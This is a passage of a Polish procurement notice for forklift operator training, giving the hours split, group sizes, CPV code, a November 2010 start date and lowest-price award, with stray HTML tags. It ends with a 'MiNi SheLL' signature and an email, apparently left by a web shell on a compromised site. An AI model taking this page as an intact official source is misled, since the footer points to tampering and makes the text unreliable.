2)	Zajęcia teoretyczne muszą zostać przeprowadzone dla grupy 15 osobowej łącznie. 
3)   Liczba godzin szkolenie: 127  godzin zajęć, w tym: 
a) 47 godziny teorii z zakresu obsługi wózków jezdniowych, 
b) 5 godzin zajęć praktycznych z bezpiecznej wymiany butli ,
c) 75 godzin zajęć praktycznych z obsługi wózków jezdniowych (zajęcia praktyczne mają odbywać się w 5 grupach 3 osobowych z wykorzystaniem dwóch wózków jezdniowych równocześnie po jednym dla każdej grupy, po 15 godzin dla każdej z grup)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com